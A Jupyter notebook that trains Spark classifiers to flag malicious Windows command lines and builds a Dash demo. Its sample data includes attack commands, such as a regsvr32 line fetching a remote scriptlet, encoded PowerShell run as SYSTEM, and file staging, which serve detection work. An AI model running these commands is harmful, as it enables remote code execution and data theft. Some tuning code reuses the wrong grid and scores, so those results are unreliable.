In [1]:
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
import pandas as pd
import numpy as np
import seaborn as sns
import re
import matplotlib.pyplot as plt
from pyspark.ml import feature, evaluation, Pipeline
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.classification import NaiveBayes
from pyspark.ml.feature import VectorAssembler, StandardScaler
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
from functools import reduce
from pyspark.sql import DataFrame
from pyspark.sql import Row

In [2]:
conf = (SparkConf()
            .setAppName('modeling')
            .setMaster('spark://spark-master:7077')
       )
conf.set("spark.executor.memory", "6g")
conf.set("spark.driver.maxResultSize", "0")
conf.set("spark.sql.shuffle.partitions", "6")
conf.set("spark.default.parallelism", "6")
conf.set("spark.driver.memory", "3g") 

<pyspark.conf.SparkConf at 0x7f1f48fd9128>

In [3]:
spark = SparkSession.builder.config(conf=conf).getOrCreate()

In [4]:
spark.sparkContext.getConf().getAll()

[('spark.default.parallelism', '6'),
 ('spark.executor.id', 'driver'),
 ('spark.executor.memory', '6g'),
 ('spark.driver.host', 'b673edb6b90c'),
 ('spark.driver.memory', '3g'),
 ('spark.driver.port', '35835'),
 ('spark.rdd.compress', 'True'),
 ('spark.master', 'spark://spark-master:7077'),
 ('spark.serializer.objectStreamReset', '100'),
 ('spark.driver.maxResultSize', '0'),
 ('spark.app.name', 'modeling'),
 ('spark.submit.deployMode', 'client'),
 ('spark.sql.shuffle.partitions', '6'),
 ('spark.ui.showConsoleProgress', 'true'),
 ('spark.app.id', 'app-20191208021447-0135')]

In [5]:
df = (spark.read.format('csv')
      .option('inferSchema', 'true')
      .option('header', 'true')
      .option('escape', '"')
      .load('hdfs://namenode:9000/data/labeled_process_logs.csv') 
      .dropna() 
     )
df.cache()

DataFrame[command_line: string, class_label: int]

# Data Cleaning and Engineering

---


### The target labels are unbalanced, and will result in a model with high bias that won't generalize well.  the minority class (1) will be resampled

In [None]:
df.groupBy('class_label').count().toPandas().plot.bar(x='class_label', y='count')

In [None]:
df.count()

### Create train, validation, test split

In [6]:
training_df, validation_df, testing_df = df.randomSplit([0.6, 0.3, 0.1], seed=0)

In [7]:
[training_df.count(), validation_df.count(), testing_df.count()]

[31493, 15589, 5313]

### Sample with replacment (bootstrap) the minority class to even out the class distribution

In [None]:
sc = spark.sparkContext

# create a list of minority class rdd objects
list_of_rdds = [training_df.filter('class_label == 1').sample(withReplacement=True, fraction=.1).rdd for x in range(300)]

# combine the rdds
combined_rdds = sc.union(list_of_rdds)

# create a df from the original dataset and the resampled minority class
combined_df = spark.createDataFrame(sc.union([training_df.rdd, combined_rdds]))

In [None]:
%%time
combined_df.groupBy('class_label').count().toPandas().plot.bar(x='class_label', y='count')

### Save bootstrapped data to disk and reload to continue modeling

In [None]:
# write resampled df to disk
combined_df.toPandas().to_csv('resampled_df.csv', header=True, index=False)

In [8]:
# load resampled df and cache
training_df = (spark.read.format('csv')
      .option('inferSchema', 'true')
      .option('header', 'true')
      .option('quote', '\"')
      .option('escape', '\"')
      .load('hdfs://namenode:9000/data/resampled_df.csv') 
     )
training_df.cache()

DataFrame[command_line: string, class_label: int]

### Create command line tokens

In [9]:
import re
@F.udf(returnType=T.StringType())
def clean_input2(s):
    common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'v1.0', 'powershell.exe', '']
    
    pattern = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
        | (>>)
    """, re.VERBOSE)
    
    return ','.join([x.lower() for x in re.sub(pattern, ' ', s).split() if x.lower() not in common_strings and len(x) >= 2])

In [10]:
from pyspark.sql.functions import regexp_extract, regexp_replace, col, count, split, size, to_date

def clean_input1(df):
    _df = df.select(
        '*'
    ).withColumn(
        'class_label', (col('class_label').cast('int'))
    ).withColumn(
        'cmd_line_tokens', split(clean_input2(col('command_line')), ',')
    )
    
    return _df

In [11]:
training_df = clean_input1(training_df)

### Cleaned command line tokens

In [12]:
training_df.select('cmd_line_tokens').sample(.10).show(5, False)

+-----------------------------------------------------------------------------------+
|cmd_line_tokens                                                                    |
+-----------------------------------------------------------------------------------+
|[-c, -s, -f, -t, empty, -m, empty, -a, -u, empty]                                  |
|[backgroundtransferhost.exe, -servername, backgroundtransferhost.1]                |
|[backgroundtransferhost.exe, -servername, backgroundtransferhost.4]                |
|[program, files, x86, google, chrome, application, chrome.exe, --, https, cnn.com/]|
|[program, files, x86, google, chrome, application, chrome.exe, --, https, cnn.com/]|
+-----------------------------------------------------------------------------------+
only showing top 5 rows



In [13]:
training_df.groupBy('class_label').count().show()

+-----------+-----+
|class_label|count|
+-----------+-----+
|          1|28427|
|          0|30589|
+-----------+-----+



### Drop rows without atleast 2 tokens

In [14]:
training_df = training_df.filter(F.size('cmd_line_tokens') > 2)

### Create freq and tfidf pipeline and fit to training data

In [17]:
idf_pipeline = Pipeline(stages=[
    feature.CountVectorizer(minTF=1, minDF=3, inputCol='cmd_line_tokens', outputCol='tf'),
    feature.IDF(inputCol='tf', outputCol='tfidf')
])

In [18]:
std = StandardScaler(withMean=True, withStd=True, inputCol='tfidf', outputCol='scaled_tfidf')
va = VectorAssembler(inputCols=['scaled_tfidf'], outputCol='features')

# Logestic Regression Modeling
---

### Create logistic regression model

In [19]:
lr = LogisticRegression(featuresCol='features', labelCol='class_label')

In [20]:
lr_pipeline = Pipeline(stages=[
    idf_pipeline, 
    std,
    va,
    lr
]).fit(training_df)

In [21]:
lr_pipeline.stages

[PipelineModel_7cf420fc4f05,
 StandardScaler_9da5e20caf3d,
 VectorAssembler_a7b97ad71b4d,
 LogisticRegressionModel: uid = LogisticRegression_94f4943040af, numClasses = 2, numFeatures = 2001]

In [22]:
import pandas as pd
vocabulary = lr_pipeline.stages[0].stages[0].vocabulary
weights = lr_pipeline.stages[-1].coefficients.toArray()  
coeffs_df = pd.DataFrame({'token': vocabulary, 'weight': weights})

### Inference

In [23]:
validation_df = clean_input1(validation_df)

In [24]:
lr_pipeline.transform(validation_df).\
    select(F.expr('float(prediction = class_label)').alias('correct')).\
    select(F.avg('correct')).show()

+------------------+
|      avg(correct)|
+------------------+
|0.9921098210276477|
+------------------+



### The positive class is 1 (malicious) so the positive weights indicate a feature that contributes positively to being classified as malicious

In [25]:
coeffs_df.sort_values('weight', ascending=False).head(20)

Unnamed: 0,token,weight
155,.zip,1.966767
81,net,1.848486
38,/c,1.775381
12,-c,1.671403
35,reg,1.636291
11,bypass,1.598199
13,-executionpolicy,1.593883
141,remove-item,1.554045
761,-argumentlist,1.340173
116,share,1.313412


### Example of malicious tokens

In [26]:
training_df.filter('class_label == 1').sample(.1).select('cmd_line_tokens').show(5, truncate=False)

+------------------------------------------------------------------------+
|cmd_line_tokens                                                         |
+------------------------------------------------------------------------+
|[users, public, -server, http, 192.168.4.10, 8888, -group, my_group, -v]|
|[users, public, -server, http, 192.168.4.10, 8888, -group, my_group, -v]|
|[users, public, -server, http, 192.168.4.10, 8888, -group, my_group, -v]|
|[regsvr32.exe, /s, /u, /i, https, regsvr32.sct, scrobj.dll]             |
|[regsvr32.exe, /s, /u, /i, https, regsvr32.sct, scrobj.dll]             |
+------------------------------------------------------------------------+
only showing top 5 rows



### The negative class is 0 (benign) so the negative weights indicate a feature that contributes negatively to being classified as benign

In [27]:
coeffs_df.sort_values('weight').head(20)

Unnamed: 0,token,weight
266,reg.exe,-1.831852
29,0xffffffff,-1.209903
30,-forcev1,-1.209903
31,conhost.exe,-1.209903
65,start_browser.ps1,-1.111311
46,documents,-1.095012
42,-noexit,-1.05474
47,-k,-0.861132
517,winlogbeat,-0.790021
5,application,-0.746122


### Example of benign tokens

In [28]:
training_df.filter('class_label == 0').sample(.20).select('cmd_line_tokens').show(5, truncate=False)

+-------------------------------------------------------------------+
|cmd_line_tokens                                                    |
+-------------------------------------------------------------------+
|[-c, -s, -f, -t, empty, -m, empty, -a, -u, empty]                  |
|[backgroundtransferhost.exe, -servername, backgroundtransferhost.1]|
|[backgroundtransferhost.exe, -servername, backgroundtransferhost.1]|
|[backgroundtransferhost.exe, -servername, backgroundtransferhost.1]|
|[backgroundtransferhost.exe, -servername, backgroundtransferhost.1]|
+-------------------------------------------------------------------+
only showing top 5 rows



### Create another model with elastic net regularization to control overfitting and mitigate noisy data
+ will grid search over these regParam and elasticNetParam parameters during validation

In [29]:
en_lr_pipeline = Pipeline(stages=[
    idf_pipeline,
    std,
    va,
    LogisticRegression(featuresCol='features',labelCol='class_label',regParam=0.02,elasticNetParam=0.3)
])

en_lr_estimator = en_lr_pipeline.fit(training_df)

### Examine the coefficients of the base LR w/ regularization model to determine how well it learned the weights for the tokens

In [31]:
coefs = en_lr_estimator.stages[-1].coefficients.toArray()  
en_lr_word_coefs = pd.DataFrame({'token': en_lr_estimator.stages[0].stages[0].vocabulary, 'weight': coefs})

+ malicious tokens

In [32]:
en_lr_word_coefs.sort_values('weight', ascending=False)[0:20]

Unnamed: 0,token,weight
12,-c,0.218349
11,bypass,0.17487
13,-executionpolicy,0.138694
38,/c,0.138177
81,net,0.099871
35,reg,0.089796
113,/i,0.077699
44,hklm,0.072113
82,/s,0.067931
32,software,0.057978


+ benign tokens

In [33]:
en_lr_word_coefs.sort_values('weight', ascending=True).head(20)

Unnamed: 0,token,weight
5,application,-0.492389
6,chrome.exe,-0.491002
2,program,-0.490695
3,files,-0.490695
4,x86,-0.485431
120,-servername,-0.428959
47,-k,-0.4148
7,--type,-0.343134
65,start_browser.ps1,-0.340685
30,-forcev1,-0.333568


# LR Model Tuning

+ Perform grid-search over TF-IDF and regularization parameters
---

In [34]:
en_lr_estimator.stages

[PipelineModel_cd02adf098d5,
 StandardScaler_9da5e20caf3d,
 VectorAssembler_a7b97ad71b4d,
 LogisticRegressionModel: uid = LogisticRegression_1271876c8153, numClasses = 2, numFeatures = 2001]

In [35]:
paramGrid = (ParamGridBuilder() 
                 .addGrid(en_lr_pipeline.stages[3].regParam, [0.0, 0.01, 0.02]) 
                 .addGrid(en_lr_pipeline.stages[3].elasticNetParam, [0.0, 0.2, 0.4]) 
                 .build()
            )

+ Loop over each parameter mapping in paramGrid and fit model

In [36]:
lr_models = []
for g in range(len(paramGrid)):
    print("Fitting model {}".format(g))
    _model = en_lr_pipeline.fit(validation_df, paramGrid[g])
    lr_models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6
Fitting model 7
Fitting model 8


+ Get the AUC score for each model

In [37]:
evaluator = BinaryClassificationEvaluator(labelCol='class_label', metricName='areaUnderROC')
lr_auc_scores = [evaluator.evaluate(model.transform(validation_df)) for model in lr_models]

In [38]:
lr_best_model_idx = np.argmax(lr_auc_scores)
lr_best_model = lr_models[lr_best_model_idx]
print("Best params: \n\n{}\n".format(paramGrid[lr_best_model_idx]))
print("Best Validation AUC: \n\n{}".format(lr_auc_scores[lr_best_model_idx]))

Best params: 

{Param(parent='LogisticRegression_1271876c8153', name='regParam', doc='regularization parameter (>= 0)'): 0.0, Param(parent='LogisticRegression_1271876c8153', name='elasticNetParam', doc='the ElasticNet mixing parameter, in range [0, 1]. For alpha = 0, the penalty is an L2 penalty. For alpha = 1, it is an L1 penalty'): 0.4}

Best Validation AUC: 

0.999865666834375


## LR best model
+ regParam: 0.0
+ elasticNet: 0.4

### Examine the coefficients of the `best model` to determine how well it learned the weights for the tokens
+ optimizing the regularization parameters drastically changed the learned weights

In [39]:
lr_best_model.stages[-1].intercept

-293.6955348296553

In [40]:
best_coefs = lr_best_model.stages[-1].coefficients.toArray()
best_vocab = lr_best_model.stages[0].stages[0].vocabulary
best_model_word_coefs = pd.DataFrame({'token': best_vocab, 'weight': best_coefs})

In [41]:
best_model_word_coefs.sort_values('weight', ascending=False).head(20)

Unnamed: 0,token,weight
257,wmic,48.974631
162,net,47.091766
279,query,44.957191
206,/t,40.601034
193,-name,35.059946
328,wmic.exe,34.13253
201,reg,33.381022
222,path,30.43145
110,bypass,29.986377
115,-executionpolicy,29.894707


# LR Cross Validation
+ test best_model performance on training dataset

In [42]:
testing_df = clean_input1(testing_df)

In [43]:
testing_auc = evaluator.evaluate(lr_best_model.transform(testing_df))
print("Testing AUC: \n\n{}".format(round(testing_auc,7)))

Testing AUC: 

0.9834943


In [44]:
lr_best_model_df = lr_best_model.transform(testing_df)
tp = lr_best_model_df.filter((lr_best_model_df.class_label == 1) & (lr_best_model_df.prediction == 1)).count()
tn = lr_best_model_df.filter((lr_best_model_df.class_label == 0) & (lr_best_model_df.prediction == 0)).count()
fp = lr_best_model_df.filter((lr_best_model_df.class_label == 0) & (lr_best_model_df.prediction == 1)).count()
fn = lr_best_model_df.filter((lr_best_model_df.class_label == 1) & (lr_best_model_df.prediction == 0)).count()
recall = tp / (tp + fn)

In [45]:
recall

0.9634146341463414

In [46]:
pd.DataFrame(data=[[tn,fp],[fn,tp]], index=['actual_0', 'actual_1'], columns=['predicted_0', 'predicted_1'])

Unnamed: 0,predicted_0,predicted_1
actual_0,5128,21
actual_1,6,158


### A malicious log classified as benign (false negative) is the worst case scenario for this domain, therefore, recall is the metric used to evaluate the model because the recall metric measures the true positive rate

# Random Forest Modeling
---

### Data engineering pipelines 
+ Term Frequency (one-hot): value indicates if feature is present in observation
+ Feature has to be present at least once in dataset and in at least 50 documents

In [47]:
cv_transformer = feature.CountVectorizer(minTF=1, minDF=5, binary=True, inputCol='cmd_line_tokens', outputCol='tf')

In [48]:
estimator = Pipeline(stages=[cv_transformer]).fit(training_df)

In [49]:
estimator.transform(training_df).select('cmd_line_tokens','tf').sample(.2).show(20, False)

+-----------------------------------------------------------------------------------+--------------------------------------------------------------------------+
|cmd_line_tokens                                                                    |tf                                                                        |
+-----------------------------------------------------------------------------------+--------------------------------------------------------------------------+
|[-c, -s, -f, -t, empty, -m, empty, -a, -u, empty]                                  |(1561,[12,76,189,236,574,622,676,1032],[1.0,1.0,1.0,1.0,1.0,1.0,1.0,1.0]) |
|[-c, -s, -f, -t, empty, -m, empty, -a, -u, empty]                                  |(1561,[12,76,189,236,574,622,676,1032],[1.0,1.0,1.0,1.0,1.0,1.0,1.0,1.0]) |
|[-c, -s, -f, -t, empty, -m, empty, -a, -u, empty]                                  |(1561,[12,76,189,236,574,622,676,1032],[1.0,1.0,1.0,1.0,1.0,1.0,1.0,1.0]) |
|[backgroundtransferhost.exe, -ser

In [50]:
len(estimator.stages[0].vocabulary)

1561

In [51]:
rf = RandomForestClassifier(featuresCol='tf', labelCol='class_label', maxDepth=6, numTrees=100, 
                            featureSubsetStrategy='sqrt', impurity='gini', seed=0)
rf_estimator = Pipeline(stages=[cv_transformer, rf])
rf_model = rf_estimator.fit(training_df)

In [52]:
rf_model.transform(testing_df).\
    select(F.avg(F.expr('float(class_label = prediction)')).alias('accuracy')).\
    first()

Row(accuracy=0.8115942028985508)

In [53]:
print(rf_model.stages[-1].trees[3].toDebugString)

DecisionTreeClassificationModel (uid=dtc_b7edb91ab7ab) of depth 6 with 13 nodes
  If (feature 13 <= 0.5)
   If (feature 6 <= 0.5)
    If (feature 193 <= 0.5)
     If (feature 418 <= 0.5)
      If (feature 30 <= 0.5)
       If (feature 87 <= 0.5)
        Predict: 1.0
       Else (feature 87 > 0.5)
        Predict: 0.0
      Else (feature 30 > 0.5)
       Predict: 0.0
     Else (feature 418 > 0.5)
      Predict: 0.0
    Else (feature 193 > 0.5)
     Predict: 0.0
   Else (feature 6 > 0.5)
    Predict: 0.0
  Else (feature 13 > 0.5)
   Predict: 1.0



### RF Inference

+ The tokens with the most importance all indicate a malicious log and are very similar to the tokens identified in the LR model

In [54]:
vocab = rf_model.stages[0].vocabulary
feature_importance = rf_model.stages[-1].featureImportances.toArray()
vocab_importance_df = pd.DataFrame({'vocab': vocab, 'weight': feature_importance})
vocab_importance_df.sort_values('weight', ascending=False).head(20)

Unnamed: 0,vocab,weight
0,chrome,0.09442
2,files,0.072146
5,application,0.067458
3,program,0.066213
6,chrome.exe,0.064263
7,--type,0.062808
4,x86,0.046605
8,renderer,0.041698
11,bypass,0.034118
13,-executionpolicy,0.033992


# RF Model Tuning
---

In [55]:
paramGrid = (ParamGridBuilder() 
                 .addGrid(rf_model.stages[0].minDF, [3,5,10]) 
                 .addGrid(rf_model.stages[1].numTrees, [300,400,500]) 
                 .addGrid(rf_model.stages[1].maxDepth, [10,15,20])
                 .build()
            )

In [56]:
%%time
models = []
for grid in range(len(paramGrid)):
    print("Fitting model {}".format(grid))
    _model = rf_estimator.fit(validation_df, paramGrid[grid])
    models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6
Fitting model 7
Fitting model 8
Fitting model 9
Fitting model 10
Fitting model 11
Fitting model 12
Fitting model 13
Fitting model 14
Fitting model 15
Fitting model 16
Fitting model 17
Fitting model 18
Fitting model 19
Fitting model 20
Fitting model 21
Fitting model 22
Fitting model 23
Fitting model 24
Fitting model 25
Fitting model 26
CPU times: user 745 ms, sys: 272 ms, total: 1.02 s
Wall time: 8min 47s


In [62]:
evaluator = BinaryClassificationEvaluator(labelCol='class_label', metricName='areaUnderROC')
auc_scores = [evaluator.evaluate(model.transform(validation_df)) for model in models]

In [58]:
auc_scores

[0.9908053299767449,
 0.9924531249148592,
 0.9949516461148276,
 0.9902868417977608,
 0.9925394765441427,
 0.9933807427239103,
 0.9914499021297748,
 0.993149538317722,
 0.9942604546772764,
 0.9873545947543013,
 0.9898357094032308,
 0.9911019981509701,
 0.9883429841306746,
 0.9909370900000424,
 0.9914223543707396,
 0.9852508995402856,
 0.9901214038822361,
 0.9904204181568188,
 0.9857429751700846,
 0.9902126747542043,
 0.9902354546318681,
 0.9830885518173347,
 0.9885918978105284,
 0.9928943431433628,
 0.9867593663894333,
 0.9889687874808453,
 0.9905599732877555]

In [59]:
best_model_idx = np.argmax(auc_scores)
best_model = models[best_model_idx]
print("Best params: \n\n{}\n".format(paramGrid[best_model_idx]))
print("Best Validation AUC: \n\n{}".format(auc_scores[best_model_idx]))

Best params: 

{Param(parent='CountVectorizer_21a0df430785', name='minDF', doc='Specifies the minimum number of different documents a term must appear in to be included in the vocabulary. If this is an integer >= 1, this specifies the number of documents the term must appear in; if this is a double in [0,1), then this specifies the fraction of documents. Default 1.0'): 3.0, Param(parent='RandomForestClassifier_2d1b3e0e7989', name='numTrees', doc='Number of trees to train (>= 1)'): 300, Param(parent='RandomForestClassifier_2d1b3e0e7989', name='maxDepth', doc='Maximum depth of the tree. (>= 0) E.g., depth 0 means 1 leaf node; depth 1 means 1 internal node + 2 leaf nodes.'): 20}

Best Validation AUC: 

0.9949516461148276


## Best model
+ minDF: 3
+ numTrees: 500
+ maxDepth: 20

In [60]:
vocab = best_model.stages[0].vocabulary
feature_importance = best_model.stages[-1].featureImportances.toArray()
best_vocab_importance_df = pd.DataFrame({'token': vocab, 'importance': feature_importance})
best_vocab_importance_df.sort_values('importance', ascending=False).head(20)

Unnamed: 0,token,importance
111,bypass,0.070698
115,-executionpolicy,0.06135
109,-c,0.057549
162,net,0.03584
170,/c,0.027415
193,-name,0.026329
203,reg,0.025096
199,hklm,0.023629
184,foreach,0.023023
215,-recurse,0.022016


In [61]:
print(best_model.stages[-1].trees[2].toDebugString)

DecisionTreeClassificationModel (uid=dtc_8ecad7124bcc) of depth 20 with 41 nodes
  If (feature 115 <= 0.5)
   If (feature 162 <= 0.5)
    If (feature 328 <= 0.5)
     If (feature 978 <= 0.5)
      If (feature 215 <= 0.5)
       If (feature 3 <= 0.5)
        If (feature 709 <= 0.5)
         If (feature 199 <= 0.5)
          If (feature 551 <= 0.5)
           If (feature 891 <= 0.5)
            If (feature 839 <= 0.5)
             If (feature 195 <= 0.5)
              If (feature 245 <= 0.5)
               If (feature 915 <= 0.5)
                If (feature 536 <= 0.5)
                 If (feature 1088 <= 0.5)
                  If (feature 1105 <= 0.5)
                   If (feature 634 <= 0.5)
                    If (feature 785 <= 0.5)
                     If (feature 691 <= 0.5)
                      Predict: 0.0
                     Else (feature 691 > 0.5)
                      Predict: 1.0
                    Else (feature 785 > 0.5)
                     Predict: 1.0
              

# RF Cross Validation
---
+ test best_model performance on training dataset

In [63]:
evaluator.evaluate(best_model.transform(testing_df))

0.9943364565224599

In [64]:
best_model_df = best_model.transform(testing_df)
tp = best_model_df.filter((best_model_df.class_label == 1) & (best_model_df.prediction == 1)).count()
tn = best_model_df.filter((best_model_df.class_label == 0) & (best_model_df.prediction == 0)).count()
fp = best_model_df.filter((best_model_df.class_label == 0) & (best_model_df.prediction == 1)).count()
fn = best_model_df.filter((best_model_df.class_label == 1) & (best_model_df.prediction == 0)).count()
recall = tp / (tp + fn)

In [65]:
recall

0.3719512195121951

In [66]:
pd.DataFrame(data=[[tn,fp],[fn,tp]], index=['actual_0', 'actual_1'], columns=['predicted_0', 'predicted_1'])

Unnamed: 0,predicted_0,predicted_1
actual_0,5149,0
actual_1,103,61


# Naive Bayes Modeling
---

In [67]:
nb = NaiveBayes(featuresCol='tf', labelCol='class_label', smoothing=1, modelType='bernoulli')
nb_estimator = Pipeline(stages=[cv_transformer, nb])
nb_model = nb_estimator.fit(training_df)

In [68]:
nb_model.transform(testing_df).\
    select(F.avg(F.expr('float(class_label = prediction)')).alias('accuracy')).\
    first()

Row(accuracy=0.8784114436288349)

# NB Model Tuning

In [69]:
nb_paramGrid = (ParamGridBuilder() 
                 .addGrid(nb_model.stages[0].minDF, [1, 5, 10, 20, 50, 75, 100]) 
                 .build()
            )

In [74]:
nb_models = []
for grid in range(len(nb_paramGrid)):
    print("Fitting model {}".format(grid))
    _model = nb_estimator.fit(validation_df, paramGrid[grid])
    nb_models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6


In [75]:
evaluator = BinaryClassificationEvaluator(labelCol='class_label', metricName='areaUnderROC')
nb_auc_scores = [evaluator.evaluate(model.transform(validation_df)) for model in nb_models]

In [76]:
nb_auc_scores

[0.8603672963902749,
 0.8603672963902749,
 0.8603672963902749,
 0.8603672963902749,
 0.8603672963902749,
 0.8603672963902749,
 0.860367296390275]

In [77]:
nb_best_model_idx = np.argmax(auc_scores)
nb_best_model = nb_models[nb_best_model_idx]
print("Best params: \n\n{}\n".format(paramGrid[nb_best_model_idx]))
print("Best AUC: \n\n{}".format(nb_auc_scores[nb_best_model_idx]))

Best params: 

{Param(parent='CountVectorizer_21a0df430785', name='minDF', doc='Specifies the minimum number of different documents a term must appear in to be included in the vocabulary. If this is an integer >= 1, this specifies the number of documents the term must appear in; if this is a double in [0,1), then this specifies the fraction of documents. Default 1.0'): 3.0, Param(parent='RandomForestClassifier_2d1b3e0e7989', name='numTrees', doc='Number of trees to train (>= 1)'): 300, Param(parent='RandomForestClassifier_2d1b3e0e7989', name='maxDepth', doc='Maximum depth of the tree. (>= 0) E.g., depth 0 means 1 leaf node; depth 1 means 1 internal node + 2 leaf nodes.'): 20}

Best AUC: 

0.8603672963902749


### NB Best model
+ minDF: 50

# NB Cross Validation
+ test best_model performance on training dataset

In [78]:
evaluator.evaluate(nb_best_model.transform(testing_df))

0.8871134106077901

In [79]:
nb_best_model_df = nb_best_model.transform(testing_df)
tp = nb_best_model_df.filter((nb_best_model_df.class_label == 1) & (nb_best_model_df.prediction == 1)).count()
tn = nb_best_model_df.filter((nb_best_model_df.class_label == 0) & (nb_best_model_df.prediction == 0)).count()
fp = nb_best_model_df.filter((nb_best_model_df.class_label == 0) & (nb_best_model_df.prediction == 1)).count()
fn = nb_best_model_df.filter((nb_best_model_df.class_label == 1) & (nb_best_model_df.prediction == 0)).count()
nb_recall = tp / (tp + fn)

In [80]:
nb_recall

0.9878048780487805

In [81]:
pd.DataFrame(data=[[tn,fp],[fn,tp]], index=['actual_0', 'actual_1'], columns=['predicted_0', 'predicted_1'])

Unnamed: 0,predicted_0,predicted_1
actual_0,4842,307
actual_1,2,162


# Plotly Dash Code (LR model)
---

In [82]:
common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'v1.0', 'powershell.exe', '']

import re
def demo_clean_input(s):
    pattern = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
        | (>>)
    """, re.VERBOSE)
    
    return ','.join([x.lower() for x in re.sub(pattern, ' ', s).split() if x.lower() not in common_strings and len(x) >= 2])

# demo_clean_input("C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc")
# demo_clean_input(r'//download.sysinternals.com/files/pstools.zip')
# demo_clean_input(r'C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\regsvr32.exe" /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll')
# demo_clean_input(r'powershell.exe -ExecutionPolicy Bypass -C "Get-WmiObject -Class Win32_UserAccount"')
# demo_clean_input(r'powershell.exe -ExecutionPolicy Bypass -C "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\Emulate-Administrator-Tasks.ps1\""')

In [83]:
def get_coefs(tokens):
    """ get the coefficient for tokens passed from GUI and returns as string """
    
    _format = "{}: *{:.2f}*\n"
    s = ""

    token_coefs = []
    for token in tokens.split(','):
        try:
            weight = round(best_model_word_coefs.loc[best_model_word_coefs.loc[:, 'token'] == token, 'weight'].values[0], 2)
            s += _format.format(token, weight)
        except:
            weight = 0.0  # token is not in vocabulary, therefore return 0 for weight
            s += _format.format(token, weight)   
    return s

# get_coefs('cmd.exe,/c,/t')

In [84]:
def spark_code(s):
    """ tokenizes the input and calls the existing feature and prediction pipelines to transform the input """
    
    # create tokens
    tokens = demo_clean_input(s)
    print(tokens)
    
    # create dataframe
    _schema = T.StructType([
        T.StructField('cmd_line_tokens', T.StringType(), True)
    ])         
    myrow = Row(cmd_line_tokens=tokens)
    text_df = spark.createDataFrame([myrow], schema=_schema)
    text_df = text_df.select(
        '*'
    ).withColumn(
        'cmd_line_tokens', F.split(col('cmd_line_tokens'), ',')
    )
    
    #transform features using existing pipelines
    features = best_model.transform(text_df)
    
    _features = features.select('cmd_line_tokens').rdd.take(1)[0]['cmd_line_tokens']
    prediction = features.select('prediction').rdd.take(1)[0]['prediction']
    probability = features.select('probability').rdd.take(1)[0]['probability']
    
    coefs = get_coefs(tokens)
    
    result = """
    Tokens: {} \n 
    Probability: {} \n 
    Prediction: {} \n 
    {}
    """
    
    if prediction == 0.0:
        return result.format(_features, probability, prediction, "*** Benign ***"), coefs
    else:
        return result.format(_features, probability, prediction, "*** Malicious ***"), coefs
                         
# spark_code('C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc /c')
# spark_code(r'"powershell.exe -ExecutionPolicy Bypass -C ""Compress-Archive -Path C:\Users\win10-user3\staged-DestinationPath C:\Users\win10-user3\staged.zip -Force;ls C:\Users\win10-user3\staged.zip | foreach {$_.FullName} | select')

In [None]:
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from jupyterlab_dash import AppViewer
from dash.dependencies import Input, Output

external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

viewer = AppViewer()

app = dash.Dash(name=__name__, external_stylesheets=external_stylesheets)

markdown_text = '''
### Windows process command-line classifier (Logistic Regression)
Please copy and paste your log in the box below
'''

sample_input_data = r'''
### Example malicious logs 
+ C:\Windows\system32\regsvr32.exe" /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ powershell.exe -ExecutionPolicy Bypass -C "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object"
+ cmd.exe /C "net share"
powershell.exe -ExecutionPolicy Bypass -C "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\Emulate-Administrator-Tasks.ps1\""
### Example benign logs 
+ C:\Windows\system32\dllhost.exe /Processid:{B2FEB3AD-8AE6-42E7-B2E4-60609573B404}
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS 
+ C:\Windows\System32\Upfc.exe /launchtype boot /cv 09o3CnnAskG8AMTNUwkQhQ.0
### Example logs not in dataset
+ cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr "powershell.exe -nop -exec bypass -EncodedCommand $pcode" /sc ONLOGON /RU SYSTEM'
+ cmd.exe /c dir /s /b \\\\FILE001\\secrets
+ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nop -exec bypass -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA
+ cmd.exe /c reg query "\\\\\\\\FILE001\\secrets\\hklm\\system\\currentcontrolset\\control\\terminal server
'''

app.layout = html.Div([
    html.Div([
        html.Div([
            dcc.Markdown(children=markdown_text),
            dcc.Textarea(id='input', value='C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc', style={'height': '50px', 'width': '50%'}),
            
        html.Div([html.Button(children='Submit', id='button', n_clicks=0)], style={'margin': '2px'}),
            
        html.Div([
            dcc.Textarea(id='output', value='', style={'height': '175px', 'width': '50%'}),
            dcc.Textarea(id='coefs', value='', style={'height': '175px', 'width': '25%'})
        ]),
